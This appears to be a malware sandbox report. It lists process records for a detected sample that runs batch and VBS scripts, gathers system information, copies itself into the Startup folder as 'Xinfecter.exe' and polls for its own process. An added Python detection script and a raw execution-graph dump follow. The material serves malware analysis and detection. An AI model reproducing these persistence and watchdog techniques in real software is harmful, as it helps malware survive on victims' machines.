                                                                                                      Start time:07:42:18
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:30
                                                                                                      Start time:07:42:18
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:31
                                                                                                      Start time:07:42:18
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /v
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:32
                                                                                                      Start time:07:42:18
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /I /c "dcdcf"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:33
                                                                                                      Start time:07:42:19
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
                                                                                                      Imagebase:0x7ff7fc430000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:34
                                                                                                      Start time:07:42:19
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:35
                                                                                                      Start time:07:42:19
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:36
                                                                                                      Start time:07:42:19
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:systeminfo
                                                                                                      Imagebase:0x2c0000
                                                                                                      File size:76'800 bytes
                                                                                                      MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:37
                                                                                                      Start time:07:42:19
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /i "original"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:38
                                                                                                      Start time:07:42:20
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                                                                                      Imagebase:0x7ff6d08f0000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:39
                                                                                                      Start time:07:42:20
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ver
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:40
                                                                                                      Start time:07:42:20
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:timeout /t 15 /nobreak
                                                                                                      Imagebase:0xe20000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:42
                                                                                                      Start time:07:42:21
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                                                                                      Imagebase:0x7ff7fc430000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:43
                                                                                                      Start time:07:42:21
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:44
                                                                                                      Start time:07:42:22
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                                                                                      Imagebase:0x7ff7fc430000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:45
                                                                                                      Start time:07:42:22
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:46
                                                                                                      Start time:07:42:22
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:tasklist /v
                                                                                                      Imagebase:0x7ff785d20000
                                                                                                      File size:106'496 bytes
                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:47
                                                                                                      Start time:07:42:22
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:find /I /c "dcdcf"
                                                                                                      Imagebase:0x7ff66db80000
                                                                                                      File size:17'920 bytes
                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:48
                                                                                                      Start time:07:42:27
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
                                                                                                      Imagebase:0x10000
                                                                                                      File size:1'257'984 bytes
                                                                                                      MD5 hash:8F807535948B5E93317BAF48A4D0E69D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 84%, ReversingLabs
                                                                                                      Has exited:true

                                                                                                      Target ID:49
                                                                                                      Start time:07:42:27
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:51
                                                                                                      Start time:07:42:35
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:52
                                                                                                      Start time:07:42:35
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /I "BiXS3FRoLe.exe"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:53
                                                                                                      Start time:07:42:35
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:timeout /t 15 /nobreak
                                                                                                      Imagebase:0xe20000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:54
                                                                                                      Start time:07:42:50
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:55
                                                                                                      Start time:07:42:50
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /I "BiXS3FRoLe.exe"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:56
                                                                                                      Start time:07:42:50
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:timeout /t 15 /nobreak
                                                                                                      Imagebase:0xe20000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:57
                                                                                                      Start time:07:43:05
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:58
                                                                                                      Start time:07:43:05
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /I "BiXS3FRoLe.exe"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:59
                                                                                                      Start time:07:43:05
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:timeout /t 15 /nobreak
                                                                                                      Imagebase:0xe20000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:60
                                                                                                      Start time:07:43:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                      Imagebase:0x7ff795930000
                                                                                                      File size:468'120 bytes
                                                                                                      MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:61
                                                                                                      Start time:07:43:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:62
                                                                                                      Start time:07:43:20
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:63
                                                                                                      Start time:07:43:20
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /I "BiXS3FRoLe.exe"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true
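
The process records above show two behaviours worth turning into detection logic: Target 48 is the submitted sample itself (same MD5, 8F807535948B5E93317BAF48A4D0E69D) re-executed from the per-user Startup folder as Xinfecter.exe, and Targets 51 through 63 are a tasklist | find | timeout loop that re-checks every 15 seconds whether BiXS3FRoLe.exe is still running. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's flat key:value process records (RECORDS is a constructed excerpt transcribed from this page) and flags both patterns. The thresholds (MIN_ITERATIONS and the cadence tolerance) are assumptions, not values from the report.

```python
"""Added example (not part of the Joe Sandbox report): a detection pass over
the process records listed above. It parses the report's flat key:value
records and flags two behaviours visible in them: the sample re-launching a
same-MD5 copy of itself from the per-user Startup folder, and a
tasklist / find / timeout loop polling every 15 s for the original image.
RECORDS is a constructed excerpt transcribed from the page; MIN_ITERATIONS
and the cadence tolerance are assumed thresholds, not report values."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

SAMPLE_MD5 = "8f807535948b5e93317baf48a4d0e69d"   # submitted sample, from the report header
STARTUP_DIR = "\\start menu\\programs\\startup\\"  # per-user Startup folder (lower-cased)
MIN_ITERATIONS = 3                                 # assumption: 3 steady polls = a loop
TASKLIST_FILTER = re.compile(r'tasklist\s+/fi\s+"imagename eq ([^"]+)"', re.I)

RECORDS = r"""
Target ID:48
Start time:07:42:27
Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
MD5 hash:8F807535948B5E93317BAF48A4D0E69D

Target ID:51
Start time:07:42:35
Path:C:\Windows\SysWOW64\tasklist.exe
Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv

Target ID:52
Start time:07:42:35
Path:C:\Windows\SysWOW64\find.exe
Commandline:find /I "BiXS3FRoLe.exe"

Target ID:53
Start time:07:42:35
Path:C:\Windows\SysWOW64\timeout.exe
Commandline:timeout /t 15 /nobreak

Target ID:54
Start time:07:42:50
Path:C:\Windows\SysWOW64\tasklist.exe
Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv

Target ID:57
Start time:07:43:05
Path:C:\Windows\SysWOW64\tasklist.exe
Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv

Target ID:62
Start time:07:43:20
Path:C:\Windows\SysWOW64\tasklist.exe
Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
"""


def parse_records(text):
    """One dict per blank-line-separated record; split on the first ':' only so a drive letter survives."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            rec[key.strip()] = value.strip()
        records.append(rec)
    return records


def startup_self_copies(records, sample_md5=SAMPLE_MD5):
    """Image paths under a Startup folder whose MD5 equals the submitted sample."""
    return [rec["Path"] for rec in records
            if STARTUP_DIR in rec.get("Path", "").lower()
            and rec.get("MD5 hash", "").lower() == sample_md5.lower()]


def watchdog_loops(records, min_iterations=MIN_ITERATIONS):
    """tasklist image filters repeating at a steady cadence, paired with a find.exe
    search for the same name: the 'is the original process still alive' loop."""
    polls = defaultdict(list)   # image name -> start times of tasklist polls
    grep_targets = set()        # image names also searched for with find.exe
    for rec in records:
        cmd = rec.get("Commandline", "")
        m = TASKLIST_FILTER.search(cmd)
        if m:
            polls[m.group(1).lower()].append(datetime.strptime(rec["Start time"], "%H:%M:%S"))
        elif rec.get("Path", "").lower().endswith("\\find.exe") and cmd.count('"') >= 2:
            grep_targets.add(cmd.split('"')[1].lower())
    loops = []
    for image, times in polls.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(times) < min_iterations or image not in grep_targets:
            continue
        period = statistics.median(gaps)
        if all(abs(g - period) <= max(2.0, 0.2 * period) for g in gaps):  # steady cadence
            loops.append({"image": image, "iterations": len(times), "period_s": period})
    return loops


def analyse(text=RECORDS):
    recs = parse_records(text)
    return {"startup_self_copies": startup_self_copies(recs), "watchdog_loops": watchdog_loops(recs)}
```

Run against the excerpt, analyse() reports the Startup-folder copy and one loop for bixs3frole.exe with four iterations at a 15 s period. The cadence check is deliberately tolerant (20 % or 2 s) because sandbox timestamps only carry second resolution; a real triage pipeline would feed it the full process list, where the loop also shows up as the repeated trio of tasklist, find and timeout children with elevated privileges, as the records above indicate.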


                                                                                                        Execution Graph

                                                                                                        Execution Coverage:4.9%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:23.3%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:41
execution_graph: the report renders this as an interactive call graph of about 2000 nodes; its serialized node/edge listing does not survive as text and is cut off at the end of this excerpt. What the listing does preserve: the first node, at 0xb24832, calls GetCurrentProcess and DuplicateHandle; a node downstream of it at 0xb249bb calls CreateProcessA and is followed by CloseHandle at 0xb24a00. The other Win32 APIs named in the graph are HeapAlloc, RtlFreeHeap, GetLastError, EnterCriticalSection, LeaveCriticalSection and IsProcessorFeaturePresent, alongside CRT/STL runtime helpers (_free, __dosmaperr, __Stollx, __cftof, __wsopen_s, _Maklocstr, std::_Locinfo, std::_Xfsopen, ___std_exception_copy, __FrameHandler3::FrameUnwindToState).
b36da2 28 API calls 4 library calls 109336->109348 109349 b41f96 109337->109349 109341 b36e93 109343 b34d66 _free 20 API calls 109341->109343 109344 b24b1c 109343->109344 109344->109153 109344->109154 109345->109167 109346->109167 109347->109167 109348->109344 109350 b41fa2 109349->109350 109351 b41fb9 109349->109351 109354 b259b3 __Stollx 20 API calls 109350->109354 109352 b41fc1 109351->109352 109353 b41fd8 109351->109353 109355 b259b3 __Stollx 20 API calls 109352->109355 109376 b32e0d 10 API calls 2 library calls 109353->109376 109357 b41fa7 109354->109357 109358 b41fc6 109355->109358 109374 b25122 26 API calls __cftof 109357->109374 109375 b25122 26 API calls __cftof 109358->109375 109359 b41fdf MultiByteToWideChar 109362 b4200e 109359->109362 109363 b41ffe GetLastError 109359->109363 109378 b35b94 109362->109378 109377 b2597d 20 API calls 3 library calls 109363->109377 109366 b36e8d 109366->109341 109373 b36da2 28 API calls 4 library calls 109366->109373 109368 b4203e 109371 b34d66 _free 20 API calls 109368->109371 109369 b4201d MultiByteToWideChar 109369->109368 109370 b42032 GetLastError 109369->109370 109385 b2597d 20 API calls 3 library calls 109370->109385 109371->109366 109373->109341 109374->109366 109375->109366 109376->109359 109377->109366 109379 b35bd2 109378->109379 109383 b35ba2 std::_Locinfo::_W_Getmonths 109378->109383 109380 b259b3 __Stollx 20 API calls 109379->109380 109382 b35bd0 109380->109382 109381 b35bbd RtlAllocateHeap 109381->109382 109381->109383 109382->109368 109382->109369 109383->109379 109383->109381 109386 b2cfdd 7 API calls 2 library calls 109383->109386 109385->109368 109386->109383 109387->109183 109389 b21d41 109388->109389 109390 b21d56 109388->109390 109391 b259b3 __Stollx 20 API calls 109389->109391 109394 b21d51 std::_Xfsopen 109390->109394 109406 b21b25 109390->109406 109393 b21d46 109391->109393 109423 b25122 26 API calls __cftof 109393->109423 109394->109185 109400 b21d78 109401 b358de 
Concurrency::details::_CancellationTokenState::_RegisterCallback 31 API calls 109400->109401 109402 b21d7e 109401->109402 109402->109394 109403 b34d66 _free 20 API calls 109402->109403 109403->109394 109404->109187 109405->109187 109407 b21b3d 109406->109407 109411 b21b39 109406->109411 109408 b336a5 __fread_nolock 26 API calls 109407->109408 109407->109411 109409 b21b5d 109408->109409 109424 b3553d 109409->109424 109412 b34e40 109411->109412 109413 b34e56 109412->109413 109414 b21d72 109412->109414 109413->109414 109415 b34d66 _free 20 API calls 109413->109415 109416 b336a5 109414->109416 109415->109414 109417 b336b1 109416->109417 109418 b336c6 109416->109418 109419 b259b3 __Stollx 20 API calls 109417->109419 109418->109400 109420 b336b6 109419->109420 109581 b25122 26 API calls __cftof 109420->109581 109422 b336c1 109422->109400 109423->109394 109425 b35549 __FrameHandler3::FrameUnwindToState 109424->109425 109426 b35551 109425->109426 109430 b35569 109425->109430 109427 b259a0 __dosmaperr 20 API calls 109426->109427 109429 b35556 109427->109429 109428 b35607 109431 b259a0 __dosmaperr 20 API calls 109428->109431 109432 b259b3 __Stollx 20 API calls 109429->109432 109430->109428 109433 b3559e 109430->109433 109434 b3560c 109431->109434 109442 b3555e std::_Locinfo::_Locinfo_dtor 109432->109442 109449 b3cba4 EnterCriticalSection 109433->109449 109436 b259b3 __Stollx 20 API calls 109434->109436 109438 b35614 109436->109438 109437 b355a4 109439 b355c0 109437->109439 109440 b355d5 109437->109440 109504 b25122 26 API calls __cftof 109438->109504 109444 b259b3 __Stollx 20 API calls 109439->109444 109450 b35628 109440->109450 109442->109411 109446 b355c5 109444->109446 109445 b355d0 109503 b355ff LeaveCriticalSection __wsopen_s 109445->109503 109447 b259a0 __dosmaperr 20 API calls 109446->109447 109447->109445 109449->109437 109451 b35656 109450->109451 109452 b3564f 109450->109452 109453 b3565a 109451->109453 109454 b35679 109451->109454 109529 b005bb 109452->109529 
